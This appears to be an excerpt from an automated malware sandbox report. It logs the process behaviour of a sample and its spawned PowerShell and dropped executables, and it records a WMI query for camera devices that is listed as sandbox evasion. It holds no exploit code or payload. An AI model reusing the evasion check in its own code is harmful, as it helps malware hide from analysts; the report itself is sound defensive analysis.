Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
